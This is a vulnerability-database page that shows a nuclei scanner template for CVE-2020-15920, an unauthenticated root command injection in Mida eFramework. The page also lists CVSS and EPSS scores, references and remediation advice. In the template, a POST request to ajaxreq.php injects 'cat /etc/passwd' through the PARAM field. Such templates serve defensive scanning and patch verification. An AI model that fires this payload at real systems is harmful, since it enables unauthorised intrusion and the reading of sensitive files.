Lucene search

K

Mida eFramework <=2.9.0 - Remote Command Execution

🗓️ 01 Sep 2020 18:31:38Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

Mida eFramework <=2.9.0 - Remote Command Execution with no authentication required, allowing attackers to gain root privileges, CVSS score of 9.

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
Prion
Command injection
24 Jul 202001:15
prion
NVD
CVE-2020-15920
24 Jul 202001:15
nvd
Packet Storm
Mida eFramework 2.9.0 Remote Code Execution
27 Aug 202000:00
packetstorm
Packet Storm
Mida Solutions eFramework ajaxreq.php Command Injection
16 Sep 202000:00
packetstorm
0day.today
Mida Solutions eFramework ajaxreq.php Command Injection Exploit
16 Sep 202000:00
zdt
Metasploit
Mida Solutions eFramework ajaxreq.php Command Injection
30 Aug 202012:46
metasploit
Exploit DB
Mida eFramework 2.9.0 - Remote Code Execution
27 Aug 202000:00
exploitdb
Cvelist
CVE-2020-15920
24 Jul 202000:58
cvelist
CVE
CVE-2020-15920
24 Jul 202001:15
cve
Rapid7 Blog
Metasploit Wrap-Up
18 Sep 202018:28
rapid7blog
Rows per page
id: CVE-2020-15920

info:
  name: Mida eFramework <=2.9.0 - Remote Command Execution
  author: dwisiswant0
  severity: critical
  description: Mida eFramework through 2.9.0 allows an attacker to achieve remote code execution with administrative (root) privileges. No authentication is required.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: |
    Upgrade Mida eFramework to a version higher than 2.9.0 to mitigate the vulnerability.
  reference:
    - https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
    - http://packetstormsecurity.com/files/158991/Mida-eFramework-2.9.0-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/159194/Mida-Solutions-eFramework-ajaxreq.php-Command-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15920
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-15920
    cwe-id: CWE-78
    epss-score: 0.9722
    epss-percentile: 0.998
    cpe: cpe:2.3:a:midasolutions:eframework:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: midasolutions
    product: eframework
  tags: cve2020,cve,mida,rce,packetstorm,midasolutions

http:
  - method: POST
    path:
      - "{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402207d45a5b1b4e5e08f6c1ac5ce8bfa100579ad8700faf3ef66f1cbd8de312c8fb002201ca8b31906a1f6a645abe4495315efe1b892450026fc519f80bbe4cb7bb542fc:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Sep 2020 18:38Current
9.9High risk
Vulners AI Score9.9
CVSS210
CVSS39.8
EPSS0.955
21
.json
Report